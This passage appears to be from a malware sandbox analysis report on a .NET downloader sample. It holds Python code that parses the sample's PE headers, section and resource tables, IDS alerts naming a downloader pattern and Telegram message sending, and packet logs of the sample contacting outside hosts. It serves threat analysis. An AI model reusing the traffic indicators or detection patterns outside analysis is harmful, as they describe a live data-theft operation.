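IMAGE_FILE_MACHINE_I386, PE32_MAGIC, DIR_IAT, DIR_CLR = 0x014C, 0x10B, 12, 14
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
DOTNET4_RELEASED = datetime(2010, 4, 12, tzinfo=timezone.utc)  # .NET Framework 4.0 ship date

# Values copied from the report's static info; a header-only PE32 is constructed from them.
REPORT = dict(image_base=0x400000, entry_rva=0x4B525E - 0x400000, time_stamp=0x3974DE67,
              dll_chars=0x0020 | 0x0040 | 0x0100 | 0x0400 | 0x8000,
              import_hash="f34d5f2d4577ed6d9ceec516c1f5a744")


def build_sample_pe(r=REPORT, iat_rva=0x2000, clr_rva=0x2008) -> bytes:
    """Constructed PE32, one .text section. IAT at RVA 0x2000 is the slot the report's
    stub jumps through; the CLR header right behind it at 0x2008 is assumed."""
    text_rva, text_raw = 0x2000, 0x200
    text_size = r["entry_rva"] - text_rva + 6               # .text up to and incl. the stub
    buf = bytearray(text_raw + text_size)
    buf[:2], buf[0x80:0x84] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", buf, 0x3C, 0x80)                  # e_lfanew
    struct.pack_into("<HHIIIHH", buf, 0x84, IMAGE_FILE_MACHINE_I386, 1, r["time_stamp"],
                     0, 0, 224, 0x0102)                      # EXECUTABLE_IMAGE | 32BIT_MACHINE
    opt = 0x98                                               # optional header
    struct.pack_into("<HBBIIIIIIIII", buf, opt, PE32_MAGIC, 48, 0, text_size, 0, 0,
                     r["entry_rva"], text_rva, 0, r["image_base"], 0x2000, 0x200)
    struct.pack_into("<HHHHHHIIIIHH", buf, opt + 40, 4, 0, 4, 0, 4, 0, 0,
                     text_rva + ((text_size + 0x1FFF) & ~0x1FFF), 0x200, 0, 2, r["dll_chars"])
    struct.pack_into("<IIIIII", buf, opt + 72, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    struct.pack_into("<II", buf, opt + 96 + 8 * DIR_IAT, iat_rva, 8)
    struct.pack_into("<II", buf, opt + 96 + 8 * DIR_CLR, clr_rva, 72)
    struct.pack_into("<8sIIIIIIHHI", buf, opt + 224, b".text", text_size, text_rva,
                     text_size, text_raw, 0, 0, 0, 0, 0x60000020)  # CODE | EXECUTE | READ
    stub = text_raw + r["entry_rva"] - text_rva              # jmp dword ptr [image_base + iat_rva]
    buf[stub:stub + 6] = b"\xff\x25" + struct.pack("<I", r["image_base"] + iat_rva)
    return bytes(buf)


def parse_headers(data: bytes) -> dict:
    """Minimal PE32 reader for the fields the report lists, plus directories and sections."""
    pe, = struct.unpack_from("<I", data, 0x3C)
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("not PE32")
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    dll_chars, = struct.unpack_from("<H", data, opt + 70)
    ndirs, = struct.unpack_from("<I", data, opt + 92)
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = [struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i) for i in range(nsect)]
    return dict(machine=machine, time_stamp=ts, entry_rva=entry_rva, image_base=image_base,
                dll_chars=dll_chars, dirs=dirs, sections=sections)


def rva_to_offset(hdr: dict, rva: int) -> int:
    for _name, vsize, va, rawsize, rawptr in hdr["sections"]:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    raise ValueError(f"RVA {rva:#x} is in no section")


def managed_entry_stub(data: bytes, hdr: dict):
    """A .NET PE32 entry point is 'jmp dword ptr [imm32]' (FF 25) through the IAT slot
    holding mscoree!_CorExeMain; return what the stub points at, else None."""
    off = rva_to_offset(hdr, hdr["entry_rva"])
    if data[off:off + 2] != b"\xff\x25":
        return None
    slot_va, = struct.unpack_from("<I", data, off + 2)
    slot_rva = slot_va - hdr["image_base"]
    iat_rva, iat_size = hdr["dirs"][DIR_IAT]
    clr_rva, clr_size = hdr["dirs"][DIR_CLR]
    return dict(slot_va=slot_va, in_iat=iat_rva <= slot_rva < iat_rva + iat_size,
                has_clr_header=bool(clr_rva and clr_size))


def timestamp_plausible(ts: int) -> bool:
    """A .NET 4.0 image cannot predate the 4.0 runtime: earlier = forged/random/hash."""
    return datetime.fromtimestamp(ts, tz=timezone.utc) >= DOTNET4_RELEASED


def imphash(imports) -> str:
    """pefile-style import hash: 'lib.func' pairs, lowercased, extension dropped, MD5."""
    parts = []
    for lib, func in imports:
        lib = lib.lower()
        lib = lib[:-4] if lib.endswith((".dll", ".ocx", ".sys")) else lib
        parts.append(f"{lib}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def analyse(data: bytes) -> dict:
    hdr = parse_headers(data)
    return dict(machine_i386=hdr["machine"] == IMAGE_FILE_MACHINE_I386,
                entry_va=hdr["image_base"] + hdr["entry_rva"],
                linked_utc=datetime.fromtimestamp(hdr["time_stamp"], tz=timezone.utc)
                .strftime("%Y-%m-%d %H:%M:%S"),
                timestamp_plausible=timestamp_plausible(hdr["time_stamp"]),
                dll_chars=[n for b, n in DLL_CHARACTERISTICS.items() if hdr["dll_chars"] & b],
                managed_stub=managed_entry_stub(data, hdr))


if __name__ == "__main__":
    print(analyse(build_sample_pe()))
    print("imphash of mscoree!_CorExeMain alone:", imphash([("mscoree.dll", "_CorExeMain")]))
```

Two practical consequences for triage: the Import Hash is worthless as a pivot for this sample because it is the shared value of every .NET executable (pivot on the TLSH, SSDEEP or the .NET type/method names instead), and the 2000 timestamp should not be entered as a build date in any timeline. HIGH_ENTROPY_VA on a 32-bit image is a compiler default that has no effect, so its presence says nothing about the author.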
                                                                                                                                                              Instruction
                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                              add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb5210          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb6000          0x13ac8       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xca000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xb3264       0xb3400   ca24903e1a54d4620213a802a8cb08dd  False     0.6400488689853556   data       7.045918402735076    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xb6000          0x13ac8       0x13c00   3b35da8abd436ffa84ad1a516fa28b1b  False     0.42601611946202533  data       6.0105573277605675   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xca000          0xc           0x200     4c89f604887db2a126260a77844927b7  False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                                   Language  Country        ZLIB Complexity
RT_ICON        0xb6658  0x42b0  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                     0.9922680412371134
RT_ICON        0xba908  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors                           0.4594882729211087
RT_ICON        0xbb7b0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors                           0.48826714801444043
RT_ICON        0xbc058  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors                            0.478110599078341
RT_ICON        0xbc720  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors                            0.37210982658959535
RT_ICON        0xbcc88  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600                                                0.24201244813278008
RT_ICON        0xbf230  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224                                                0.2924484052532833
RT_ICON        0xc02d8  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400                                                0.3942622950819672
RT_ICON        0xc0c60  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                                                0.49379432624113473
RT_ICON        0xc10c8  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 640                                                  0.33198924731182794
RT_ICON        0xc13b0  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 192                                                  0.41216216216216217
RT_ICON        0xc14d8  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 192                                                  0.42905405405405406
RT_ICON        0xc1600  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 640                                                  0.2661290322580645
RT_ICON        0xc18e8  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 512                                                  0.18010752688172044
RT_ICON        0xc1bd0  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 128                                                  0.35135135135135137
RT_ICON        0xc1cf8  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors                           0.06092057761732852
RT_ICON        0xc25a0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors                            0.07658959537572255
RT_ICON        0xc2b08  0xca8   Device independent bitmap graphic, 32 x 64 x 24, image size 3072                                                0.042901234567901236
RT_ICON        0xc37b0  0x368   Device independent bitmap graphic, 16 x 32 x 24, image size 768                                                 0.10550458715596331
RT_ICON        0xc3b18  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0                                                   0.6400709219858156
RT_ICON        0xc3f80  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 192                                                  0.5
RT_ICON        0xc40a8  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                                                0.19060283687943264
RT_ICON        0xc4510  0x1128  Device independent bitmap graphic, 32 x 64 x 32, image size 4352                                                0.11429872495446267
RT_ICON        0xc5638  0x2668  Device independent bitmap graphic, 48 x 96 x 32, image size 9792                                                0.07211147274206672
RT_ICON        0xc7ca0  0x1952  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                     0.7099660598580685
RT_GROUP_ICON  0xc95f4  0x3e    data                                                                                                            0.8709677419354839
RT_GROUP_ICON  0xc9634  0x84    data                                                                                                            0.6893939393939394
RT_GROUP_ICON  0xc96b8  0x22    data                                                                                                            1.0588235294117647
RT_GROUP_ICON  0xc96dc  0x22    data                                                                                                            1.0588235294117647
RT_GROUP_ICON  0xc9700  0x5a    data                                                                                                            0.7666666666666667
RT_GROUP_ICON  0xc975c  0x22    data                                                                                                            1.1176470588235294
RT_VERSION     0xc9780  0x348   data                                                                                   English   United States  0.4154761904761905
DLL          Import
mscoree.dll  _CorExeMain
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2025-01-08T16:33:08.959347+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49821        132.226.8.169    80         TCP
2025-01-08T16:33:10.111995+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49821        132.226.8.169    80         TCP
2025-01-08T16:33:10.683264+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49836        188.114.97.3     443        TCP
2025-01-08T16:33:11.537491+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4  49841        132.226.8.169    80         TCP
2025-01-08T16:33:15.157202+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49869        188.114.97.3     443        TCP
2025-01-08T16:33:18.079410+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.4  49892        188.114.97.3     443        TCP
2025-01-08T16:33:21.949552+0100  1810007  Joe Security ANOMALY Telegram Send Message         1         192.168.2.4  49920        149.154.167.220  443        TCP
Timestamp                          Source Port  Dest Port  Source IP      Dest IP
Jan 8, 2025 16:33:07.821955919 CET  49821        80         192.168.2.4    132.226.8.169
Jan 8, 2025 16:33:07.826802015 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:07.826909065 CET  49821        80         192.168.2.4    132.226.8.169
Jan 8, 2025 16:33:07.827218056 CET  49821        80         192.168.2.4    132.226.8.169
Jan 8, 2025 16:33:07.831980944 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:08.627363920 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:08.630911112 CET  49821        80         192.168.2.4    132.226.8.169
Jan 8, 2025 16:33:08.635660887 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:08.905949116 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:08.952450991 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:08.952493906 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:08.952575922 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:08.959347010 CET  49821        80         192.168.2.4    132.226.8.169
Jan 8, 2025 16:33:08.960103989 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:08.960123062 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.571170092 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.571250916 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:09.575360060 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:09.575380087 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.575673103 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.615621090 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:09.628108978 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:09.675323009 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.780637026 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.780689955 CET  443          49827      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:09.780874968 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:09.787493944 CET  49827        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:09.791059971 CET  49821        80         192.168.2.4    132.226.8.169
Jan 8, 2025 16:33:09.795845032 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:10.063947916 CET  80           49821      132.226.8.169  192.168.2.4
Jan 8, 2025 16:33:10.066129923 CET  49836        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:10.066153049 CET  443          49836      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:10.066231966 CET  49836        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:10.066503048 CET  49836        443        192.168.2.4    188.114.97.3
Jan 8, 2025 16:33:10.066517115 CET  443          49836      188.114.97.3   192.168.2.4
Jan 8, 2025 16:33:10.111994982 CET  49821        80         192.168.2.4    132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.523819923 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.525259018 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.525278091 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.683288097 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.683351994 CET44349836188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.683496952 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.684163094 CET49836443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:10.687520981 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.688711882 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.692450047 CET8049821132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.692620039 CET4982180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.693470955 CET8049841132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:10.693572998 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.693666935 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:10.698412895 CET8049841132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.486530066 CET8049841132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.487879038 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:11.487909079 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.488028049 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:11.488281012 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:11.488292933 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:11.537491083 CET4984180192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.088023901 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.089840889 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:12.089867115 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.231367111 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.231429100 CET44349847188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.231489897 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:12.231995106 CET49847443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:12.237262011 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.242084980 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:12.242161989 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.242264032 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:12.247066975 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.042296886 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.043539047 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.043574095 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.043629885 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.043889999 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.043905973 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.084407091 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.522797108 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.524523973 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.524547100 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.651992083 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.652060986 CET44349859188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.652169943 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.652590036 CET49859443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:13.655731916 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.656764030 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.660665989 CET8049853132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.661570072 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:13.661746979 CET4985380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.661780119 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.661869049 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:13.666593075 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.477482080 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.479029894 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:14.479074955 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.479134083 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:14.479398012 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:14.479408979 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:14.521862984 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.005306005 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.007201910 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.007225990 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.157234907 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.157299042 CET44349869188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.157587051 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.157875061 CET49869443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.161279917 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.162470102 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.166263103 CET8049863132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.166321993 CET4986380192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.167258024 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.167334080 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.167418003 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:15.172147036 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.970668077 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.972712994 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.972764015 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:15.972868919 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.973401070 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:15.973428965 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.021925926 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.443481922 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.445400000 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:16.445425034 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.596282005 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.596348047 CET44349880188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.596412897 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:16.596875906 CET49880443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:16.603815079 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.604456902 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.610398054 CET8049874132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.610543013 CET4987480192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.610851049 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:16.610929966 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.611049891 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:16.617454052 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.398276091 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.400063038 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.400087118 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.400255919 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.407385111 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.407397985 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.443761110 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:17.922718048 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:17.924806118 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:17.924832106 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.079444885 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.079519033 CET44349892188.114.97.3192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.079601049 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.080121040 CET49892443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.101367950 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.102816105 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.106251001 CET8049886132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.106323004 CET4988680192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.107636929 CET8049897132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.107701063 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.107815027 CET4989780192.168.2.4132.226.8.169
                                                                                                                                                              Jan 8, 2025 16:33:18.112612009 CET8049897132.226.8.169192.168.2.4
                                                                                                                                                              Jan 8, 2025 16:33:18.891547918 CET8049897132.226.8.169192.168.2.4
